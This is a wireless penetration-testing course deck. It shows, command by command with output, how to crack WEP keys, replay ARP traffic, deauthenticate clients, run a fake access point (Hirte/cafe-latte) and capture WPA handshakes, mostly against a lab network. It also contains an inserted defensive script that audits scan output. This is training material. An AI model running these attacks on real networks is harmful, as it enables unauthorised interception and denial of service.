
Penetration Testing in Wireless Networks


Nelson Murilo
Clavis Segurança da Informação

$ whoami
Infosec consultant
2 published books
Pentester
Forensic investigator
Incident handler
Instructor and speaker
Contacts
nmurilo@gmail.com

nelson.murilo

@nelsonmurilo

Course model
Live classes (online)
Recorded classes for review
Test environments
Supplementary material
Assessment
Agenda
Introduction
Wi-Fi network concepts
Main vulnerabilities
Current tools
Probing and mapping
Identifying the environment
Attacks
Wrapping up
Introduction
Concepts

Characteristics

- Wi-Fi
- Bluetooth
- Infrared
- WiMax
- RFID
- Cellular (GSM/TDMA/CDMA, etc.)
- ZigBee (802.15.4)
- UWB (802.15.3)
Wireless networks
IEEE 802.11
Current standards:
802.11b - 11Mb, 2.4GHz
802.11a - 54Mb, 5.1GHz
802.11g - 54Mb, 2.4GHz
802.11i - Security mechanisms
802.1x - Authentication mechanisms, used in wired and wireless networks
802.11n - Speed increase, 108Mb nominal
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.

wlan4 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

eth4 no wireless extensions.

Channels

Channel 36 : 5.18 GHz
Channel 40 : 5.2 GHz
Channel 44 : 5.22 GHz
Channel 48 : 5.24 GHz
Channel 52 : 5.26 GHz
Channel 56 : 5.28 GHz
Channel 60 : 5.3 GHz
Channel 64 : 5.32 GHz
Channel 149 : 5.745 GHz
Channel 153 : 5.765 GHz
Channel 157 : 5.785 GHz
Channel 161 : 5.805 GHz
Channel 165 : 5.825 GHz


$ iwlist wlan0 freq
wlan0 24 channels in total, available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Ad-Hoc
Infrastructure
((( network name )))
Network name broadcast
# iwlist wlan0 scan | egrep "Address|ESSID"
[...]
Cell 03 - Address: 7C:4F:83:E4:CC:80
ESSID:"GVT-CC81"
Cell 06 - Address: 00:07:40:4D:1A:5C
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 07 - Address: 6C:2E:83:F3:0C:88
ESSID:"GVT-0C87"

23:03:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:03:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:03:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:03:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]

09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA - Enterprise
RADIUS
/etc/password
/etc/raddb/users
Oracle/MySQL/etc.
Digital certificate
Biometrics
Initial concepts
$ /sbin/ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:21:29:65:b8:45
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
# tcpdump -vv -c 3 -i wlan0
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes
14:00:37.291962 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84)
192.168.11.2 > air: ICMP echo request, id 30307, seq 9, length 64

14:00:37.292417 IP (tos 0x0, ttl 64, id 8024, offset 0, flags [DF], proto UDP (17), length 71)
192.168.11.2.49331 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-addr.arpa. (43)

14:00:37.294831 IP (tos 0x0, ttl 255, id 49706, offset 0, flags [none], proto ICMP (1), length 84)
air > 192.168.11.2: ICMP echo reply, id 30307, seq 9, length 64
3 packets captured
Promiscuous mode
# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
# iw wlan0 info
Interface wlan0
ifindex 32
type managed

# iw dev wlan0 interface add mon0 type monitor

Monitor mode
# iwconfig wlan0 mode monitor
# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
# iw mon0 info
Interface mon0
ifindex 33
type monitor

Monitor mode
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header), capture size 65535 bytes

14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]

14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2

14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Channel selection
# iwconfig mon0 channel 11

# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.462 GHz Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header),
capture size 65535 bytes

14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us
Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]

14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us
Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]

14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us
Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
3 packets captured
AP identification
CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca

BSSID STATION PWR Rate Lost Frames Probe

00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt
00-25-9C (hex) Cisco-Linksys, LLC
Traffic analysis
tshark -r Kismet-20120309-04-23-25-1.pcapdump

6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
iwconfig wlan5 essid bsbca
MAC filtering
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
Mac OSX
# ifconfig en0 ether 00:00:00:00:00:01
Wired Equivalent Privacy
Fragile protocol
Cracking requires capturing a large number of packets (3,000+)
Or a dictionary attack
Several tools available
CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS
/usr/local/etc/kismet.conf
logtypes=pcapdump,gpsxml,netxml,nettxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true
$ ls -lh kismet*
-rw-r--r-- 1 root root 8.0M 2012-02-20 14:04 kismet-20120220-13-47-37-1.pcapdump
http://blog.kismetwireless.net/
Suite made up of several programs

Traffic analysis
WEP key cracking (several types of attack)
Packet injection
WPA(2)-PSK key cracking using a dictionary
Fake access point creation

Common sequence

airmon-ng: puts the interface into monitor mode
airodump-ng: packet viewing and capture
aircrack-ng: WEP key cracking

# airmon-ng

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng start wlan5
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airmon-ng start wlan5 11
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
Airodump-ng
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.
Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
Airodump-ng
# airodump-ng mon0
CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 - 1 3 9 LABVIRUS
Aircrack-ng
$ aircrack-ng labvirus-01.pcap

[00:00:03] Tested 633 keys (got 46103 IVs)

KB depth byte(vote)
0 2/ 4 14(33332) 13(34328) 3C(33304) 98(33304) 24(33248)
1 2/ 1 DE(34784) 92(34328) 06(32992) 7D(32736) 02(32480)
2 1/ 3 82(36376) 18(34272) 43(33760) CD(33304) FC(33248)
3 1/ 3 09(37600) 08(33808) 41(33040) C9(34016) BE(32992)
4 31/ 4 A1(48640) 83(48384) 86(48384) 99(48384) 82(48384)

KEY FOUND! [ 6E:61:6F:xx:xx:xx:xx:xx:xx:xx:xx ] (ASCII: naoxxxxxxxx )
Decrypted correctly: 100%
Wired Equivalent Privacy
Aireplay-ng
# aireplay-ng --test mon0
17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP

17:33:52 Trying directed probe requests...
17:33:52 00:25:9C:36:0A:EF - channel: 11 LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
Aireplay-ng
# aireplay-ng --arpreplay -h client_mac -e ESSID interface
# arp -an
#
# ping -c 1 192.168.11.1
PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms

--- 192.168.11.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms

# arp -an
(192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0
Aireplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 353 14438 652 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS
Aireplay-ng
# airmon-ng start wlan5 11
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airodump-ng -c 11 mon0
Aireplay-ng
Wait for a new connection
Force a disconnection
aireplay-ng --deauth 100 -h CLIENT_MAC -e ESSID mon0
ivstools-ng
Aircrack-ng 1.1 r2076

[00:00:02] Tested 132441 keys (got 2448 IVs)

KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)

Failed. Next try with 5000 IVs.
Aircrack-ng 1.1 r2076

[00:00:03] Tested 163521 keys (got 7120 IVs)

KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8)

Failed. Next try with 10000 IVs.
ivstools-ng
for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done
Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Opening poucosivs-03.cap
Creating poucosivs-03.cap.ivs
Read 551433 packets.
Written 30547 IVs.
Opening poucosivs-04.cap
Creating poucosivs-04.cap.ivs
Read 129917 packets.
Written 13092 IVs.
ivstools-ng
ivstools --merge *.ivs poucostotal.ivs
Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
Opening poucosivs-03.cap.ivs
4524402 bytes written
Opening poucosivs-04.cap.ivs
6319236 bytes written
# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap
Opening poucosivs-01.cap
Opening poucosivs-02.cap
Opening poucosivs-03.cap
Opening poucosivs-04.cap
Read 689344 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)
ivstools-ng
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read 298278
Total number of WEP data packets 162412
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 108781
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327
16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311
16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
CH 11 ][ Elapsed: 4 s ][ 2012-02-27 21:14

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

2E:74:C2:8A:A3:8A -87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo
00:25:9C:36:0A:EF -43 3 0 0 1 54 WPA2 CCMP PSK Homenet54

BSSID STATION PWR Rate Lost Frames Probe

(not associated) 00:18:77:7C:2C:A7 -86 0 - 1 68 8 notebook
(not associated) 00:21:29:65:B8:45 -47 0 - 1 7 2 LABVIRUS
Wired Equivalent Privacy
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W
00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal

BSSID STATION PWR Rate Lost Frames Probe

(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
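The airodump-ng tables above are what an auditor actually reads, and the same rows carry every weakness this deck goes on to exploit. The following is an added example, not part of the original deck, that parses that table layout and turns it into findings a defender would act on: open and WEP networks, TKIP ciphers, PSK-only networks, hidden SSIDs, and unassociated clients probing for remembered networks (the situation the "AP without clients" slides rely on). The sample table is constructed from rows shown on these slides plus one invented hidden-SSID row (00:1C:10:AE:B6:90); the severity levels and messages are the example's own choices.

```python
"""Audit airodump-ng output for weak wireless settings.

Added example, not part of the original slide deck: parses the plain-text AP
and station tables that airodump-ng prints (the layout shown on the slides)
and reports what a defender would want fixed. SAMPLE is constructed from rows
on the slides plus one invented hidden-SSID row; severities are this
example's own choices.
"""
import re
from dataclasses import dataclass

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
AUTHS = {"PSK", "MGT", "OPN", "SKA"}
# AP row: BSSID PWR [RXQ] Beacons #Data #/s CH MB ENC [CIPHER [AUTH]] ESSID
# (RXQ is only printed when airodump-ng is locked to one channel with -c)
AP_RE = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)(?:\s+(?P<rxq>\d+))?"
    r"\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<ps>\d+)\s+(?P<ch>\d+)"
    r"\s+(?P<mb>\d+(?:e|\s)?\.?)\s+(?P<enc>OPN|WEP|WPA2?)\s*(?P<rest>.*)$")
# Station row: BSSID or "(not associated)", STATION, PWR, Rate, Lost, Frames, Probe
STA_RE = re.compile(
    rf"^\s*(?P<bssid>{MAC}|\(not associated\))\s+(?P<sta>{MAC})\s+(?P<pwr>-?\d+)"
    r"\s+\S+\s*-\s*\S+\s+(?P<lost>\d+)\s+(?P<frames>\d+)\s*(?P<probes>.*)$")


@dataclass
class Finding:
    severity: str   # "high", "medium" or "info"
    subject: str    # BSSID of the AP or MAC of the station
    essid: str
    message: str


def parse_ap(line: str):
    """Dict for one AP row, or None. Handles OPN/WEP rows with fewer columns."""
    m = AP_RE.match(line)
    if not m:
        return None
    enc, rest = m["enc"], m["rest"]
    cipher = auth = essid = ""
    if enc == "OPN":                  # no CIPHER/AUTH columns at all
        essid = rest
    else:
        parts = rest.split(None, 2)
        cipher = parts[0] if parts else ""
        if len(parts) > 1 and parts[1] in AUTHS:
            auth, essid = parts[1], (parts[2] if len(parts) > 2 else "")
        elif len(parts) > 1:          # AUTH blank; ESSID may contain spaces
            essid = rest.split(None, 1)[1]
    return {"bssid": m["bssid"], "ch": int(m["ch"]), "enc": enc,
            "cipher": cipher, "auth": auth, "essid": essid.strip()}


def audit(text: str) -> list:
    findings, in_stations = [], False
    for line in text.splitlines():
        if "STATION" in line:         # header of the station table
            in_stations = True
            continue
        if in_stations:
            m = STA_RE.match(line)
            probes = [p.strip() for p in m["probes"].split(",") if p.strip()] if m else []
            if m and m["bssid"] == "(not associated)" and probes:
                findings.append(Finding("medium", m["sta"], ",".join(probes),
                    "unassociated client probing for remembered networks; "
                    "a rogue AP answering to those names can lure it"))
            continue
        ap = parse_ap(line)
        if ap is None:
            continue
        b, e = ap["bssid"], ap["essid"]
        if ap["enc"] == "OPN":
            findings.append(Finding("high", b, e, "open network: no encryption at all"))
        elif ap["enc"] == "WEP":
            findings.append(Finding("high", b, e, "WEP: key recoverable from captured IVs; move to WPA2-CCMP"))
        if ap["cipher"] == "TKIP":
            findings.append(Finding("medium", b, e, "TKIP (RC4) cipher: migrate to CCMP"))
        if ap["auth"] == "PSK":
            findings.append(Finding("info", b, e, "PSK: a captured handshake allows offline guessing; use a long random passphrase or 802.1X"))
        if e == "" or e.startswith("<length:"):
            findings.append(Finding("info", b, e, "hidden SSID: no protection, the name is sent in clear in probe responses"))
    return findings


SAMPLE = """\
 CH  4 ][ Elapsed: 28 s ][ 2012-02-28 07:59

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:26:CB:11:5F:30  -64       16        0    0  11  54e. WPA2 CCMP   MGT  88200W
 00:1C:10:AE:B6:8F  -68       20        0    0   6  54   OPN              linksys
 74:EA:3A:CF:13:7C  -70       15        2    0  11  54 . WPA2 CCMP   PSK  LABVIRUS
 00:E0:FC:4D:27:49  -79        0        0    0  11  54   WPA2 TKIP   PSK  Pessoal
 00:07:40:4D:1A:5C  -39        3       17    8  11  54   WEP  WEP         LABVIRUS
 2E:74:C2:8A:A3:8A  -87        2        0    0   3  54e  WPA2 CCMP   PSK  iPhone de Marcelo
 00:1C:10:AE:B6:90  -70        4        0    0   6  54   WPA2 CCMP   PSK

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 (not associated)   DC:2B:61:33:2B:6C  -53    0 - 1      0      12  Boingo Hotspot,EuroYouthHotel,hostalparis3
 74:EA:3A:CF:13:7C  00:26:5A:74:15:28  -25   54 - 5      8      26
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"[{f.severity:6}] {f.subject} {f.essid!r}: {f.message}")
```

Run it as a script and it prints one line per finding; feed it the text of a real airodump-ng screen (or the `-w` CSV converted to this layout) to get the same report. Only the 88200W network (WPA2, CCMP, 802.1X) comes out clean, which is the configuration the rest of this deck cannot break with the tools shown.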
Wired Equivalent Privacy
# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0
09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.
Wired Equivalent Privacy

# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap

Aircrack-ng 1.1 r2076
[00:00:00] Tested 798 keys (got 38085 IVs)

KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)

KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )
Decrypted correctly: 100%


AP without clients
Migration WPA-WEP
Wired Equivalent Privacy
WPA
CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 254839 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 698 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)

Choosing first network as target.

Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol

39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)
